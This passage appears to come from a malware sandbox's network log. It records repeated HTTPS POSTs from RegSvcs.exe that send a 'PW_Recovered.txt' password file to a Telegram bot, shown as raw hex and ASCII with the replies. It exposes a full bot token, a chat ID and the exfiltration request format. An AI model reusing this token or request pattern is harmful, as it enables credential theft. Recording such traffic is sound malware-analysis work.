                                                                          2024-09-19 10:24:39 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12836,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          106192.168.2.561688149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:42 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd00d3dede440f
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:42 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 30 64 33 64 65 64 65 34 34 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dd00d3dede440fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:24:42 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:42 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:42 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12837,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          107192.168.2.561690149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:44 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd053f66608f0b
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:44 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 35 33 66 36 36 36 30 38 66 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dd053f66608f0bContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:44 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:44 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:44 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12838,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          108192.168.2.561692149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:46 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd015205408852
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:46 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 31 35 32 30 35 34 30 38 38 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dd015205408852Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:24:46 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:46 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:46 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12840,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          109192.168.2.561694149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:49 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd05da1ef7e562
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:49 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 35 64 61 31 65 66 37 65 35 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dd05da1ef7e562Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:49 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:49 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:49 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12841,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          110192.168.2.561696149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:51 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd01e8a511992d
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:51 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 31 65 38 61 35 31 31 39 39 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dd01e8a511992dContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:24:51 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:51 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:51 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12842,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          111192.168.2.561698149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:53 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd065e266dc598
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:53 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 36 35 65 32 36 36 64 63 35 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dd065e266dc598Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:53 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:53 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:53 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12843,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          112192.168.2.561700149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:55 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd0270272e694b
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:55 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 32 37 30 32 37 32 65 36 39 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dd0270272e694bContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:24:55 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:55 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
